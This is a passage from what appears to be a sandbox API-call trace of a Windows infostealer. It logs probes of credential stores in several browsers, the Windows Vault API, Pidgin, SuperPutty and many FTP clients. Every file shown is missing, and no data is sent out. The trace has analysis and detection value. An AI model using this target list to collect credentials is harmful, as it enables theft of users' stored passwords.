hHeap=0x780000) returned 1 [0313.006] GetProcessHeap () returned 0x780000 [0313.006] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798388 [0313.008] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.022] wvsprintfW (in: param_1=0x798388, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 117 [0313.022] GetProcessHeap () returned 0x780000 [0313.022] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xee) returned 0x79c310 [0313.022] GetProcessHeap () returned 0x780000 [0313.022] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798388 | out: hHeap=0x780000) returned 1 [0313.023] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.023] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 0 [0313.023] GetProcessHeap () returned 0x780000 [0313.024] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c310 | out: hHeap=0x780000) returned 1 [0313.024] GetProcessHeap () returned 0x780000 [0313.024] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798388 [0313.024] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.025] wvsprintfW (in: param_1=0x798388, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data") returned 100 [0313.025] GetProcessHeap () returned 0x780000 [0313.025] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xcc) returned 0x79c2f0 [0313.025] GetProcessHeap () returned 0x780000 [0313.026] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798388 | out: hHeap=0x780000) returned 1 [0313.026] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.026] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data") returned 0 [0313.028] GetProcessHeap () returned 0x780000 [0313.028] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2f0 | out: hHeap=0x780000) returned 1 [0313.028] GetProcessHeap () returned 0x780000 [0313.028] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798388 [0313.028] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.029] wvsprintfW (in: param_1=0x798388, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 108 [0313.029] GetProcessHeap () returned 0x780000 [0313.029] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xdc) returned 0x79c300 [0313.029] GetProcessHeap () returned 0x780000 [0313.030] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798388 | out: hHeap=0x780000) returned 1 [0313.030] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.030] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 0 [0313.030] GetProcessHeap () returned 0x780000 [0313.031] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c300 | out: hHeap=0x780000) returned 1 [0313.031] GetProcessHeap () returned 0x780000 [0313.031] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e8) returned 0x798388 [0313.031] GetProcessHeap () returned 0x780000 [0313.031] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b4c0 [0313.031] GetProcessHeap () returned 0x780000 [0313.031] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x787fa8 [0313.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.032] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\QtWeb.NET\\QtWeb Internet Browser\\AutoComplete", phkResult=0x787fa8 | out: phkResult=0x787fa8*=0x0) returned 0x2 [0313.032] GetProcessHeap () returned 0x780000 [0313.032] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x787fa8 | out: hHeap=0x780000) returned 1 [0313.032] GetProcessHeap () returned 0x780000 [0313.033] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798388 | out: hHeap=0x780000) returned 1 [0313.033] GetProcessHeap () returned 0x780000 [0313.033] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b4c0 | out: hHeap=0x780000) returned 1 [0313.033] GetProcessHeap () returned 0x780000 [0313.033] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x798388 [0313.033] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0313.034] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x798388 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0313.034] GetProcessHeap () returned 0x780000 [0313.034] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f94) returned 0x798598 [0313.034] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.035] wvsprintfW (in: param_1=0x798598, param_2="%s\\QupZilla\\profiles\\default\\browsedata.db", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QupZilla\\profiles\\default\\browsedata.db") returned 75 [0313.035] GetProcessHeap () returned 0x780000 [0313.035] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x9a) returned 0x78a9b8 [0313.035] GetProcessHeap () returned 0x780000 [0313.035] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798598 | out: hHeap=0x780000) returned 1 [0313.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.036] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QupZilla\\profiles\\default\\browsedata.db") returned 0 [0313.036] GetProcessHeap () returned 0x780000 [0313.037] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78a9b8 | out: hHeap=0x780000) returned 1 [0313.037] GetProcessHeap () returned 0x780000 [0313.037] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798388 | out: hHeap=0x780000) returned 1 [0313.049] LoadLibraryW (lpLibFileName="vaultcli.dll") returned 0x6e5d0000 [0313.781] GetProcAddress (hModule=0x6e5d0000, lpProcName="VaultEnumerateItems") returned 0x6e5db960 [0313.781] GetProcAddress (hModule=0x6e5d0000, lpProcName="VaultEnumerateVaults") returned 0x6e5f3510 [0313.782] GetProcAddress (hModule=0x6e5d0000, lpProcName="VaultFree") returned 0x6e5e7050 [0313.782] GetProcAddress (hModule=0x6e5d0000, lpProcName="VaultGetItem") returned 0x6e5dbb70 [0313.783] GetProcAddress (hModule=0x6e5d0000, lpProcName="VaultGetItem") returned 0x6e5dbb70 [0313.783] GetProcAddress (hModule=0x6e5d0000, lpProcName="VaultOpenVault") returned 0x6e5dbc10 [0313.784] GetProcAddress (hModule=0x6e5d0000, lpProcName="VaultCloseVault") returned 0x6e5dbc90 [0313.784] GetVersionExW (in: lpVersionInformation=0x19fa80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x43e3c8bb, dwMinorVersion=0x19fb5c, dwBuildNumber=0x0, dwPlatformId=0x408323, szCSDVersion="ꏐx쾓瞆") | out: lpVersionInformation=0x19fa80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0313.784] VaultEnumerateVaults () returned 0x0 [0313.793] GetProcessHeap () returned 0x780000 [0313.793] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e8) returned 0x79a2e8 [0313.793] GetProcessHeap () returned 0x780000 [0313.793] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b568 [0313.793] VaultOpenVault () returned 0x0 [0313.794] VaultEnumerateItems () returned 0x0 [0313.794] VaultFree () returned 0x0 [0313.794] VaultCloseVault () returned 0x6 [0313.797] VaultOpenVault () returned 0x0 [0313.797] VaultEnumerateItems () returned 0x0 [0313.805] VaultFree () returned 0x0 [0313.805] VaultCloseVault () returned 0x6 [0313.805] GetProcessHeap () returned 0x780000 [0313.806] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.806] GetProcessHeap () returned 0x780000 [0313.806] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b568 | out: hHeap=0x780000) returned 1 [0313.806] GetProcessHeap () returned 0x780000 [0313.806] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e8) returned 0x79a2e8 [0313.806] GetProcessHeap () returned 0x780000 [0313.806] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b520 [0313.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.809] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", phkResult=0x19fbb8 | out: phkResult=0x19fbb8*=0x0) returned 0x2 [0313.809] GetProcessHeap () returned 0x780000 [0313.810] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.810] GetProcessHeap () returned 0x780000 [0313.810] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b520 | out: hHeap=0x780000) returned 1 [0313.810] GetProcessHeap () returned 0x780000 [0313.810] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0313.810] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0313.811] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0313.811] GetProcessHeap () returned 0x780000 [0313.811] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f50) returned 0x79ab10 [0313.812] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.813] wvsprintfW (in: param_1=0x79ab10, param_2="%s\\Opera", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera") returned 43 [0313.813] GetProcessHeap () returned 0x780000 [0313.813] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5a) returned 0x798f88 [0313.813] GetProcessHeap () returned 0x780000 [0313.813] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ab10 | out: hHeap=0x780000) returned 1 [0313.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.814] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera") returned 0 [0313.814] GetProcessHeap () returned 0x780000 [0313.815] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.815] GetProcessHeap () returned 0x780000 [0313.815] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798f88 | out: hHeap=0x780000) returned 1 [0313.815] GetProcessHeap () returned 0x780000 [0313.815] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79a2e8 [0313.816] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.816] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\8pecxstudios\\Cyberfox86", pszValue="RootDir", pdwType=0x0, pvData=0x79a2e8, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x79a2e8, pcbData=0x19fba4*=0x104) returned 0x2 [0313.816] GetProcessHeap () returned 0x780000 [0313.817] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.817] GetProcessHeap () returned 0x780000 [0313.817] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79a2e8 [0313.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.818] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\8pecxstudios\\Cyberfox", pszValue="Path", pdwType=0x0, pvData=0x79a2e8, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x79a2e8, pcbData=0x19fba4*=0x104) returned 0x2 [0313.818] GetProcessHeap () returned 0x780000 [0313.818] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.818] GetProcessHeap () returned 0x780000 [0313.818] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79a2e8 [0313.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.819] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Pale Moon", pszValue="CurrentVersion", pdwType=0x0, pvData=0x79a2e8, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x79a2e8, pcbData=0x19fba4*=0x104) returned 0x2 [0313.819] GetProcessHeap () returned 0x780000 [0313.819] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.819] GetProcessHeap () returned 0x780000 [0313.819] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79a2e8 [0313.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.820] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Waterfox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x79a2e8, pcbData=0x19fb90*=0x104 | out: pdwType=0x0, pvData=0x79a2e8, pcbData=0x19fb90*=0x104) returned 0x2 [0313.820] GetProcessHeap () returned 0x780000 [0313.821] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.841] GetProcessHeap () returned 0x780000 [0313.841] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x79ab10 [0313.842] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.842] wvsprintfW (in: param_1=0x79ab10, param_2="%s\\.purple\\accounts.xml", arglist=0x19fb60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\.purple\\accounts.xml") returned 58 [0313.843] GetProcessHeap () returned 0x780000 [0313.843] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x78) returned 0x797b10 [0313.843] GetProcessHeap () returned 0x780000 [0313.843] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ab10 | out: hHeap=0x780000) returned 1 [0313.844] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.844] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\.purple\\accounts.xml") returned 0 [0313.844] GetProcessHeap () returned 0x780000 [0313.844] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797b10 | out: hHeap=0x780000) returned 1 [0313.855] GetProcessHeap () returned 0x780000 [0313.855] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0313.856] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0313.856] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0313.857] GetProcessHeap () returned 0x780000 [0313.857] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5a) returned 0x79b318 [0313.858] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.859] wvsprintfW (in: param_1=0x79b318, param_2="%s\\SuperPutty", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\SuperPutty") returned 42 [0313.859] GetProcessHeap () returned 0x780000 [0313.859] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x58) returned 0x798dd8 [0313.859] GetProcessHeap () returned 0x780000 [0313.859] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.860] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\SuperPutty") returned 0 [0313.860] GetProcessHeap () returned 0x780000 [0313.860] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.860] GetProcessHeap () returned 0x780000 [0313.861] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0313.875] GetProcessHeap () returned 0x780000 [0313.875] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0313.876] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0313.877] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0313.877] GetProcessHeap () returned 0x780000 [0313.877] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f70) returned 0x79b318 [0313.879] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.879] wvsprintfW (in: param_1=0x79b318, param_2="%s\\FTPShell\\ftpshell.fsi", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FTPShell\\ftpshell.fsi") returned 44 [0313.879] GetProcessHeap () returned 0x780000 [0313.879] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5c) returned 0x798dd8 [0313.879] GetProcessHeap () returned 0x780000 [0313.880] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.881] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTPShell\\ftpshell.fsi") returned 0 [0313.881] GetProcessHeap () returned 0x780000 [0313.881] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0313.881] GetProcessHeap () returned 0x780000 [0313.881] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.881] GetProcessHeap () returned 0x780000 [0313.881] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f9a) returned 0x79b318 [0313.882] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.882] wvsprintfW (in: param_1=0x79b318, param_2="%s\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml") returned 80 [0313.883] GetProcessHeap () returned 0x780000 [0313.883] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xa4) returned 0x79a2e8 [0313.883] GetProcessHeap () returned 0x780000 [0313.883] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.883] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.884] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml") returned 0 [0313.884] GetProcessHeap () returned 0x780000 [0313.884] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.884] GetProcessHeap () returned 0x780000 [0313.884] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0313.885] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0313.885] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0313.885] GetProcessHeap () returned 0x780000 [0313.885] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f74) returned 0x79b318 [0313.886] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.887] wvsprintfW (in: param_1=0x79b318, param_2="%s\\oZone3D\\MyFTP\\myftp.ini", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\oZone3D\\MyFTP\\myftp.ini") returned 46 [0313.887] GetProcessHeap () returned 0x780000 [0313.887] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x60) returned 0x798dd8 [0313.887] GetProcessHeap () returned 0x780000 [0313.887] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.888] PathFileExistsW (pszPath="C:\\Program Files (x86)\\oZone3D\\MyFTP\\myftp.ini") returned 0 [0313.888] GetProcessHeap () returned 0x780000 [0313.888] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0313.888] GetProcessHeap () returned 0x780000 [0313.889] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.889] GetProcessHeap () returned 0x780000 [0313.889] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x79b318 [0313.889] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.890] wvsprintfW (in: param_1=0x79b318, param_2="%s\\FTPBox\\profiles.conf", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPBox\\profiles.conf") returned 58 [0313.890] GetProcessHeap () returned 0x780000 [0313.890] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x78) returned 0x797390 [0313.890] GetProcessHeap () returned 0x780000 [0313.890] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.891] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPBox\\profiles.conf") returned 0 [0313.891] GetProcessHeap () returned 0x780000 [0313.891] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797390 | out: hHeap=0x780000) returned 1 [0313.891] GetProcessHeap () returned 0x780000 [0313.892] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0313.892] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0313.892] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0313.892] GetProcessHeap () returned 0x780000 [0313.893] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f94) returned 0x79b318 [0313.893] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.894] wvsprintfW (in: param_1=0x79b318, param_2="%s\\Sherrod Computers\\sherrod FTP\\favorites", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\Sherrod Computers\\sherrod FTP\\favorites") returned 62 [0313.894] GetProcessHeap () returned 0x780000 [0313.894] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x80) returned 0x798dd8 [0313.894] GetProcessHeap () returned 0x780000 [0313.894] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.895] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.895] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Sherrod Computers\\sherrod FTP\\favorites") returned 0 [0313.895] GetProcessHeap () returned 0x780000 [0313.895] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.895] GetProcessHeap () returned 0x780000 [0313.895] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0313.896] GetProcessHeap () returned 0x780000 [0313.896] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0313.896] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0313.896] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0313.897] GetProcessHeap () returned 0x780000 [0313.897] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f68) returned 0x79b318 [0313.897] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.898] wvsprintfW (in: param_1=0x79b318, param_2="%s\\FTP Now\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FTP Now\\sites.xml") returned 40 [0313.898] GetProcessHeap () returned 0x780000 [0313.898] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x54) returned 0x798dd8 [0313.898] GetProcessHeap () returned 0x780000 [0313.898] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.899] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.899] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTP Now\\sites.xml") returned 0 [0313.899] GetProcessHeap () returned 0x780000 [0313.899] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0313.899] GetProcessHeap () returned 0x780000 [0313.900] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.900] GetProcessHeap () returned 0x780000 [0313.900] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0313.900] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0313.901] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0313.901] GetProcessHeap () returned 0x780000 [0313.901] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f82) returned 0x79b318 [0313.901] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.902] wvsprintfW (in: param_1=0x79b318, param_2="%s\\NexusFile\\userdata\\ftpsite.ini", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\NexusFile\\userdata\\ftpsite.ini") returned 53 [0313.902] GetProcessHeap () returned 0x780000 [0313.902] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x6e) returned 0x798dd8 [0313.902] GetProcessHeap () returned 0x780000 [0313.903] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.904] PathFileExistsW (pszPath="C:\\Program Files (x86)\\NexusFile\\userdata\\ftpsite.ini") returned 0 [0313.904] GetProcessHeap () returned 0x780000 [0313.904] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0313.904] GetProcessHeap () returned 0x780000 [0313.905] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0313.905] GetProcessHeap () returned 0x780000 [0313.905] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f70) returned 0x79b318 [0313.905] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.906] wvsprintfW (in: param_1=0x79b318, param_2="%s\\NexusFile\\ftpsite.ini", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NexusFile\\ftpsite.ini") returned 59 [0313.906] GetProcessHeap () returned 0x780000 [0313.906] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7a) returned 0x798dd8 [0313.906] GetProcessHeap () returned 0x780000 [0313.907] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0313.907] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.907] PathFileExistsW 